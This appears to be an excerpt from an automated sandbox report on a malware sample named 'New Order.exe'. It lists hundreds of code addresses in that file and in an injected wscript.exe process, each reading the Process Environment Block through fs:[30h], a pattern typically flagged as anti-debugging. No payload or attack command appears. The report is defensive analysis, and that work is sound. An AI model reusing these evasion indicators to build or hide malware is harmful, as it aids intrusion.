          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C14BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CB5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CB8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C13B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C13B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C7C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C7C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CAFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CAFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CAFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CAFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C98DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BFD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BFD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C11DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C11DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C11DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C23D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C63540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C93D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C07D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C6A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CAE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C28EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C9FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C7FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CAAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CAAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C18E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CA1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C9FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BF8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C237F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C67794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C67794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C67794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BE4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00CB070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C7FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C7FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BFFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C1E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00C0B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exeCode function: 2_2_00BFEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05483D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054C3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054F3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05467D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0546C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0546C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05518D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0550E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05453D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0544AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054CA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05474D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05474D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_05474D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054C6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_054C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0545D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0545D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0550FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0550FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_054F8DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05472581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05442D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0547FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_054735A1 mov eax, dword ptr fs:[00000030h]
